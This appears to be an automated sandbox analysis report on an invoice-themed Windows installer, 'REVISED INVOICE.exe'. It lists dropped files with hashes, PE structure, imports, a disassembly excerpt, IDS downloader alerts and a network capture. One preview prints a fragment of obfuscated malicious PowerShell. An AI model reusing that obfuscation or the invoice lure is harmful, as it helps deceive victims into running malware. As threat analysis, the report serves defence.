SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Reputation: high, very likely benign file
Preview: 1

Process: C:\Users\user\Desktop\REVISED INVOICE.exe
File Type: ASCII text, with very long lines (3101), with CRLF, LF line terminators
Category: dropped
Size (bytes): 56940
Entropy (8bit): 5.310851815132353
Encrypted: false
SSDEEP: 1536:uEy/BE4CCwPB+92TmVYkP/23ytqHO0Trmd/jK:g/BEhC2M23ytqU2
MD5: 6AC57B58205D75AEE6380C3C6A8EF2A2
SHA1: 466480B2A43B6C6DD95253849ACAAFCEF82CA2B3
SHA-256: F79002317D2A561E589E0006DD549D39C71488689CE772B15F84F393926A2786
SHA-512: EA0DEA24679EDB7B4D10A62E23D52BF8102338BEA90957F27ADC92228A54BB0B49BB710B2ED9A159B48EB5AD1A353FDCEFB311A2569A82D1BED17F8F4E7782BE
Malicious: true
Reputation: low
Preview: $Haevdes=$Langtidsplans;..<#Dressrer Afterburners indstrmning #>..<#pleurodira Undespatched Toldforretningen Paahldningernes #>..<#Reprsentantskabets Halfpace Indkopiering Fortyskningen Ophugningernes Instructionary Interruptedly #>..<#Ationsvejledningers Hungredes drmmearbejdes Elitrt Bageovnenes Dagbladet #>..<#Rdsptternes kfternes Bespisendes Klageinstansen Submaniacally Stengrunden #>..<#reshook Stiklingsformerings Brambly #>...$Urokkeligste = @'.Bilgg.Qr sk$Diomer Fague OuttvHexadaResolnAligrc faglhFabriiSjakbs SkrmtBimp eUndern En esUnpr =Scrip$H nteKUrorfoFiskemMi tem ntioiSi nasd.strsEnergo MaxirB aagi uckae PrearSprngsPaket; Pres. Snblf ,hafuMagn nStivlcBungttProteiRosteoP esenkongr .hviscUnderaS,ormrPrceddBysvai R lenVagr.aBard l BesvaSmdedtTvangeEnsursAnno Lands(Scri $ HorsVKlgtiiPretrcEnergtundivi ReakmHormei,edstskus ieLinj sChalk,A tif$ receDBren,eDekomc BacueAnod p Duo.tIndlei DvrgoStapeuMy etsBe tilRotunyunse )H sto Novel{B epi. Past.Omkl $pirouOOmklduLawsotMussawPaake

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category: dropped
Size (bytes): 1007528
Entropy (8bit): 7.781042800324155
Encrypted: false
SSDEEP: 12288:KBu+je2mGYUNpeqzfAOKUXWkP/8KYfNrnEoYhJLAMhuwIm/toWyqTnoXnPolxsq8:D+63cWqv3nANr8xAGuwIm/yWiopvC9wG
MD5: 8274B1A41B53BF35E0B4330A20010D4C
SHA1: 0B263F01DD3E10389CD4FE6575D114EA301EE874
SHA-256: D2320E5704E90BC713C59A0521BACF04CA5751C2481E1DD4E3A95494981D867C
SHA-512: 727ED4FE93C9F0DA19DF61B81D3F92A9DDC9B6680B2AC841E1ED3ED37BBBE7ECC4A628DFDDF31429D2FB5034EDD6BC7F742A84F6E76FE7F7401DCD98EA3EC644
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 3%
Reputation: low
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..NP..*_...P..s...P...V...P..Rich.P..........................PE..L...s..V.................`...*......j2.......p....@..........................p............@..................................t.......`..............XV..P............................................................p...............................text...._.......`.................. ..`.rdata..p....p.......d..............@..@.data................x..............@....ndata...................................rsrc........`.......~..............@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):26
                                                                                              Entropy (8bit):3.95006375643621
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                              Malicious:false
                                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                                              Process:C:\Users\user\Desktop\REVISED INVOICE.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):322786
                                                                                              Entropy (8bit):7.714471072231169
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:s9f0Im/HiUPjZ0G2tKMrEX+s/jxbUznOpzWcILjNWgeN7yZw0:kf0Im/CYjZZwJs6zOpCcejNWgOuX
                                                                                              MD5:02093BF4E23F0DC4ED17ACE33F3071C3
                                                                                              SHA1:FF8E59EE5EB06847411F0F11319081ACC6510F8C
                                                                                              SHA-256:2F9C4D11C84DA12FC93D685D8A1CF99F0B7C9FE42D50BCD56E08D6E4B2A8014B
                                                                                              SHA-512:41F9D4A882D570DA60724494D64DAB81C2CACAB90B90B44CE5AE4726BD6DFAABF5C3E6ABF358575B3F321B62DBD7FCBC0788C49C135F511E5BE7826BDA6426CA
                                                                                              Malicious:false
                                                                                              Process:C:\Users\user\Desktop\REVISED INVOICE.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):385451
                                                                                              Entropy (8bit):1.2576424697364599
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:0zQkaCkKFWCIXNc4VzKCrtjqcgRnPnpPhxpTF1HYRT78IvzOa0X8Y7/gTggxDFJp:icoCXuttGE6uCCi4amVuAE8M
                                                                                              MD5:26C2167385AF5F3AD4501DC9EB1D1750
                                                                                              SHA1:DC579F120929FEB6743A2E708B1ECB80AB5743FC
                                                                                              SHA-256:655E599A68EC316400412338207AEE3D1E92D871D44903330831863A8422DED6
                                                                                              SHA-512:3A5A916CD1D62017C0CB1DF2DD0E4162E1D65F7FC7B3F6910FC5476D75522BCBCA14A4B8BBB581A29D090E5CB624563B6D55BECE6663866E2D5003DBA3D32868
                                                                                              Malicious:false
                                                                                              Process:C:\Users\user\Desktop\REVISED INVOICE.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):365480
                                                                                              Entropy (8bit):1.2572303082633218
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:R/4C648E1cMH3VW/bm9QbMUw48AwMj29nPxjeUdd5Q7a2lUsNEsoUILUeGjYG2lr:x/9qJoJnheHT4tVHiQIrOKKH
                                                                                              MD5:7E5D0C2FB5542434DEAA7CB9992CF70A
                                                                                              SHA1:88C1347B18718DDFEBE207B0142337AA058088E1
                                                                                              SHA-256:042CA82320646FF84D77486DB582121776CDE3A7512AAD331C52A6F7F4477F07
                                                                                              SHA-512:ECAFFC3B8E35E933BA34D9B4E8FAA23F8504CB7E3EB749C8BA6329E35B9A9983C92D5F6361EEFAF408EEDB134C65CB71E1E9BDD7BBEC01F63CFF18B02B4E9CAA
                                                                                              Malicious:false
                                                                                              Process:C:\Users\user\Desktop\REVISED INVOICE.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):394604
                                                                                              Entropy (8bit):1.254347273244326
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:xvceOaoCvXM6v7bWOSNFacQ8vOVOpLEaCJ:hp7v8yGVYcT
                                                                                              MD5:E2C31508D144E6C8890BC5DE64DBC952
                                                                                              SHA1:358FE8FF69899E52D55F9A22DF5888BC2F53E04A
                                                                                              SHA-256:E960C13536EDA3B4833CDC97DE94BD4505EBB2BDE345F8301108D7B02A6C3695
                                                                                              SHA-512:1147F2F1A552810B498623C4A8ED9DEC8A2897D49FC3672E89BA208B748076DC252B96500599F5F00805B41AE3C495DC26ECBF1484DC2E4C402FFB061F6CEEB0
                                                                                              Malicious:false
                                                                                              Process:C:\Users\user\Desktop\REVISED INVOICE.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):421672
                                                                                              Entropy (8bit):1.2617274907079155
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:NkcVLfyGsqWRxaFZcdE9c64XSMZBiMfg4EPcVdq9/aEeOD0CbLW/+Kf1BMwhindh:uPJSls/7dB0cDseO+yaKz1aWYlS6wTc
                                                                                              MD5:7B108EEEC00B60944878785541310B37
                                                                                              SHA1:18679F477149CF4571D581FE5F402C2320B31059
                                                                                              SHA-256:FADFB5887AE6B54C07F264798945B3D33DB6EC9A9A70C26B585149EF5E8CE972
                                                                                              SHA-512:D5E9C23E01A18FDC9BE811252CDED78649F1F8CD48C5F5BD8FDD1D6ED5AA29FE28E21B15705EAB4CAF743BEB7ED49B0DDA8439E9B40600D6715DA5B5C55BA775
                                                                                              Malicious:false
                                                                                              Process:C:\Users\user\Desktop\REVISED INVOICE.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):235766
                                                                                              Entropy (8bit):1.262950023618283
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:77uewIGU0VH/DujWmCpJ0oY03RZ2bp7Cb5j1AnvZwr2KbwXf+O3ThTnDrQXaUp+g:nu5Q4pn5ixn19nHIjHLyzaouVsP
                                                                                              MD5:535051A54B823E39736D2B2F2AEC56D4
                                                                                              SHA1:07507B4404013195F3A7262BBEB84AFB9FF73044
                                                                                              SHA-256:807FBB6EF44B4D318DBBA4AB3B4818E1000A2ABBEEC1A82EB6010A169C8F4541
                                                                                              SHA-512:23A36EACF7BE30F63ECCAC748F9E1AE7BFA1C3046FBC21DE229997C313AAC7E0CD2D50FAC15710B2542010511D9A7C192DA7EC722536421D032113C034E652D7
                                                                                              Malicious:false
                                                                                              Process:C:\Users\user\Desktop\REVISED INVOICE.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):429048
                                                                                              Entropy (8bit):1.2444109790439408
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:VgA+/Tb3OXWuT8THf/Ff+PaQ1LLI1xFOYUhd:w7b+mZlf+PaQ1c1xlO
                                                                                              MD5:8403F4E4069E57FA2AF93BB477EC2F5B
                                                                                              SHA1:F52F9A97B6FE053E998F33C8D7DFEBB858E30DB7
                                                                                              SHA-256:BE5DE0ACA1AC614A1F7EE90CB06C629778D368785317AF8531DBFFC946AC5D97
                                                                                              SHA-512:960AC24BF4A08D3659B2C0551826BCB4A54EF99CC1C879C15FFBB023112F54B867D31E901EC121DA0649019487ADC206B42BD28DE13A01306ABDCDD14A4EA39D
                                                                                              Malicious:false
                                                                                              Process:C:\Users\user\Desktop\REVISED INVOICE.exe
                                                                                              File Type:ASCII text, with very long lines (326), with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):508
                                                                                              Entropy (8bit):4.17807549360082
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:CXyC/gvlyY03AGDUA+VHowCpSm604erJA87vhBlyFenp6:CiC/6p03A087wBYSA8rhvywp6
                                                                                              MD5:7875B155DEAAF5AE952F60A1169B67A3
                                                                                              SHA1:09EB123FC93CDA5A858C436469D32B0E251789CE
                                                                                              SHA-256:AD0681420C18CF905F792608B5313422142D34A7984283D47FBE5AEBEE2FCD50
                                                                                              SHA-512:17DFF3F236ED9A5EF45D8C8008D6CC6F8AB080E272669CC5B23869D6CA6DFDB2E483DD517C6E479238CBE48C95BFF528ABC46896075A49E4249D908853BFC9AC
                                                                                              Malicious:false
                                                                                              Preview:fingerprint sparekassebestyrernes sumpfebers jorunns kinboot dynastier,tornls plne koordinerendes gripe berederiet recipientkvalitetsinteresser regionsplanretningslinjen griphite..beignetdejen vastiest indsluser scheherazade epostkasser acini waggery,nonperverted styringskredslb autumns.tumefaction bumbled tocalote vaporised fabriksassistenterne.liniedelinger receder stornelli regenereringernes redbreasts unoperatically unisys gennemsnitsfilters contuse downfallen unbigotedness cymaphytism raadfrslers..
                                                                                              Process:C:\Users\user\Desktop\REVISED INVOICE.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):324183
                                                                                              Entropy (8bit):1.255582183673372
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:iJxIWpDKZPWmn4EdlkbOKLvxy1xvacN7wSYpg5ZPifFQjkuIphGOod/NQfFFQgtO:9WpcQvAmccQNa2NgFnhRxMGFwvHILy
                                                                                              MD5:B36381C40D4A5D90C8B2E712830D6634
                                                                                              SHA1:20E8D57DC3B4F524727C115B48A176DBA40A24AA
                                                                                              SHA-256:FEB96AEF8BB072A8E8472A19508B424D04159389E1EA55DA73DA22C958100963
                                                                                              SHA-512:53E4AA268CD0D8F92D504920DDC7C9B67D8BA3A1D83779A0D6EF48E317D0A8E45434838A14B93D39E888032040A1671DC2D9B2CABB77B624D3048D1F6613DDEE
                                                                                              Malicious:false
                                                                                              Process:C:\Users\user\Desktop\REVISED INVOICE.exe
                                                                                              File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                                                                                              Category:dropped
                                                                                              Size (bytes):852
                                                                                              Entropy (8bit):3.1601931479458605
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:8wl0rYTXCG7GovHSLdqkNRN71Q1Nnv4fmNfBnlZ3YilMMEpxRljK:8cSU9MdqkNRN7q3dp3q
                                                                                              MD5:BFCEADD506F2A222716599DC14984F07
                                                                                              SHA1:341ED5B68587FA192D7A8B679BFD793B1BB6B24E
                                                                                              SHA-256:B0A11DD62395416C7955F41BDF83DE7EE533C2272FF86B2187A118393D71D7A6
                                                                                              SHA-512:3AE98F2E92F54D503115DE92118708F5647B93D2C3194DB4F6BA2C2158E7916C0D63282716AA50EFBC93B22CBD5B57D8F79970067308D4157FDD5B17097EA9EE
                                                                                              Malicious:false
                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                              Entropy (8bit):7.781042800324155
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                              • DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: REVISED INVOICE.exe
File size: 1'007'528 bytes
MD5: 8274b1a41b53bf35e0b4330a20010d4c
SHA1: 0b263f01dd3e10389cd4fe6575d114ea301ee874
SHA256: d2320e5704e90bc713c59a0521bacf04ca5751c2481e1dd4e3a95494981d867c
SHA512: 727ed4fe93c9f0da19df61b81d3f92a9ddc9b6680b2ac841e1ed3ed37bbbe7ecc4a628dfddf31429d2fb5034edd6bc7f742a84f6e76fe7f7401dcd98ea3ec644
SSDEEP: 12288:KBu+je2mGYUNpeqzfAOKUXWkP/8KYfNrnEoYhJLAMhuwIm/toWyqTnoXnPolxsq8:D+63cWqv3nANr8xAGuwIm/yWiopvC9wG
TLSH: 47252238FFADD922D90557705923AC9DA8B1FC044E316A5FF4953B3E9B35283EA06306
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..NP..*_...P...s...P...V...P..Rich.P..........................PE..L...s..V.................`...*.....
Icon Hash: 1b3b392333ecec23
Entrypoint: 0x40326a
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x567F8473 [Sun Dec 27 06:25:55 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: d4b94e8ee3f620a89d114b9da4b31873
Signature Valid: false
Signature Issuer: CN=Radiotelegrafisten, O=Radiotelegrafisten, L=West Walton Highway, C=GB
Signature Validation Error: A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number: -2146762487
Not Before, Not After
• 3/14/2024 2:57:36 AM 3/14/2027 1:57:36 AM
Subject Chain
• CN=Radiotelegrafisten, O=Radiotelegrafisten, L=West Walton Highway, C=GB
Version: 3
Thumbprint MD5: A7FDED8126A27703124CB00AD7D44C1E
Thumbprint SHA-1: C2DD70F19E1ABB77FECEE1FB6BA8997217F1D380
Thumbprint SHA-256: CC277E658BE1406019F1040322B0CDAFC224592CEB8BF0A4EE37D3F1956E3DF9
Serial: 3E78D97A91D31DD8E77DA75E18CC65EA13830FFF
Instruction
sub esp, 000002D4h
push ebp
push esi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+0Ch], ebp
push 00008001h
mov dword ptr [esp+0Ch], 00409300h
mov dword ptr [esp+18h], ebp
call dword ptr [004070B0h]
call dword ptr [004070ACh]
cmp ax, 00000006h
je 00007FDA4872B9F3h
push ebp
call 00007FDA4872EB36h
cmp eax, ebp
je 00007FDA4872B9E9h
push 00000C00h
call eax
push ebx
push edi
push 004092F4h
call 00007FDA4872EAB3h
push 004092ECh
call 00007FDA4872EAA9h
push 004092E0h
call 00007FDA4872EA9Fh
push 00000009h
call 00007FDA4872EB04h
push 00000007h
call 00007FDA4872EAFDh
mov dword ptr [00429224h], eax
call dword ptr [00407044h]
push ebp
call dword ptr [004072A8h]
mov dword ptr [004292D8h], eax
push ebp
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebp
push 004206C8h
call dword ptr [0040718Ch]
push 004092C8h
push 00428220h
call 00007FDA4872E6EAh
call dword ptr [004070A8h]
mov ebx, 00434000h
push eax
push ebx
call 00007FDA4872E6D8h
push ebp
call dword ptr [00407178h]
Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x74bc | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x66000 | 0x30200 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xf5658 | 0x950 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x2b8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5ffa | 0x6000 | df2f822ba33541e61d4a603b60bbdbcc | False | 0.6675211588541666 | data | 6.472885474718374 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x1370 | 0x1400 | a10c5fabf76461b1b26713fde2284808 | False | 0.4404296875 | data | 5.0714431097950134 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x20318 | 0x600 | 45bc104aba688d708375b6b0133d1563 | False | 0.5084635416666666 | data | 3.9955723529870646 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x2a000 | 0x3c000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x66000 | 0x30200 | 0x30200 | 4745466e1c17eaf1313ebf445a72f464 | False | 0.5377790178571429 | data | 6.135054497243622 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_BITMAP | 0x663d0 | 0x368 | Device independent bitmap graphic, 96 x 16 x 4, image size 768 | English | United States | 0.23623853211009174
RT_ICON | 0x66738 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.32464805394534485
RT_ICON | 0x76f60 | 0xd6c0 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9934880675203726
RT_ICON | 0x84620 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.38577359680470885
RT_ICON | 0x8dac8 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.3995040151157298
RT_ICON | 0x91cf0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.46213692946058094
RT_ICON | 0x94298 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.4383208255159475
RT_ICON | 0x95340 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.6648936170212766
RT_DIALOG | 0x957a8 | 0x120 | data | English | United States | 0.53125
RT_DIALOG | 0x958c8 | 0x118 | data | English | United States | 0.5678571428571428
RT_DIALOG | 0x959e0 | 0x120 | data | English | United States | 0.5138888888888888
RT_DIALOG | 0x95b00 | 0xf8 | data | English | United States | 0.6330645161290323
RT_DIALOG | 0x95bf8 | 0xa0 | data | English | United States | 0.6125
RT_DIALOG | 0x95c98 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x95cf8 | 0x68 | data | English | United States | 0.7596153846153846
RT_VERSION | 0x95d60 | 0x15c | data | English | United States | 0.5804597701149425
RT_MANIFEST | 0x95ec0 | 0x33f | XML 1.0 document, ASCII text, with very long lines (831), with no line terminators | English | United States | 0.5547533092659447
DLL | Import
KERNEL32.dll | SetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, LoadLibraryW, GetProcAddress, GetModuleHandleA, ExpandEnvironmentStringsW, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, GlobalFree, lstrcmpW, GlobalAlloc, WaitForSingleObject, GlobalUnlock, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll | GetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, GetDC, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, LoadImageW, SetWindowLongW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, SetTimer, FindWindowExW, SendMessageTimeoutW, SetForegroundWindow
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll | RegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-24T12:03:03.413673+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.22 | 49162 | 142.250.186.142 | 443 | TCP
2024-10-24T12:03:09.780235+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.22 | 49164 | 193.122.130.0 | 80 | TCP
2024-10-24T12:03:10.952320+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.22 | 49164 | 193.122.130.0 | 80 | TCP
2024-10-24T12:03:11.519251+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.22 | 49166 | 188.114.97.3 | 443 | TCP
2024-10-24T12:03:12.849739+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.22 | 49167 | 132.226.8.169 | 80 | TCP
2024-10-24T12:03:19.225896+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.22 | 49174 | 188.114.97.3 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 24, 2024 12:03:01.957648993 CEST | 49162 | 443 | 192.168.2.22 | 142.250.186.142
Oct 24, 2024 12:03:01.957670927 CEST | 443 | 49162 | 142.250.186.142 | 192.168.2.22
Oct 24, 2024 12:03:01.958225965 CEST | 49162 | 443 | 192.168.2.22 | 142.250.186.142
Oct 24, 2024 12:03:01.983844995 CEST | 49162 | 443 | 192.168.2.22 | 142.250.186.142
Oct 24, 2024 12:03:01.983860970 CEST | 443 | 49162 | 142.250.186.142 | 192.168.2.22
Oct 24, 2024 12:03:02.845546007 CEST | 443 | 49162 | 142.250.186.142 | 192.168.2.22
Oct 24, 2024 12:03:02.846201897 CEST | 49162 | 443 | 192.168.2.22 | 142.250.186.142
Oct 24, 2024 12:03:02.847119093 CEST | 443 | 49162 | 142.250.186.142 | 192.168.2.22
Oct 24, 2024 12:03:02.847177982 CEST | 49162 | 443 | 192.168.2.22 | 142.250.186.142
Oct 24, 2024 12:03:02.851982117 CEST | 49162 | 443 | 192.168.2.22 | 142.250.186.142
Oct 24, 2024 12:03:02.852013111 CEST | 443 | 49162 | 142.250.186.142 | 192.168.2.22
Oct 24, 2024 12:03:02.852598906 CEST | 443 | 49162 | 142.250.186.142 | 192.168.2.22
Oct 24, 2024 12:03:02.852799892 CEST | 49162 | 443 | 192.168.2.22 | 142.250.186.142
Oct 24, 2024 12:03:03.055546999 CEST | 49162 | 443 | 192.168.2.22 | 142.250.186.142
Oct 24, 2024 12:03:03.103321075 CEST | 443 | 49162 | 142.250.186.142 | 192.168.2.22
Oct 24, 2024 12:03:03.413703918 CEST | 443 | 49162 | 142.250.186.142 | 192.168.2.22
Oct 24, 2024 12:03:03.413760900 CEST | 49162 | 443 | 192.168.2.22 | 142.250.186.142
Oct 24, 2024 12:03:03.413789034 CEST | 443 | 49162 | 142.250.186.142 | 192.168.2.22
Oct 24, 2024 12:03:03.413832903 CEST | 49162 | 443 | 192.168.2.22 | 142.250.186.142
Oct 24, 2024 12:03:03.414148092 CEST | 49162 | 443 | 192.168.2.22 | 142.250.186.142
Oct 24, 2024 12:03:03.414206982 CEST | 443 | 49162 | 142.250.186.142 | 192.168.2.22
Oct 24, 2024 12:03:03.414262056 CEST | 49162 | 443 | 192.168.2.22 | 142.250.186.142
Oct 24, 2024 12:03:03.457406044 CEST | 49163 | 443 | 192.168.2.22 | 142.250.186.97
Oct 24, 2024 12:03:03.457465887 CEST | 443 | 49163 | 142.250.186.97 | 192.168.2.22
Oct 24, 2024 12:03:03.457526922 CEST | 49163 | 443 | 192.168.2.22 | 142.250.186.97
Oct 24, 2024 12:03:03.458118916 CEST | 49163 | 443 | 192.168.2.22 | 142.250.186.97
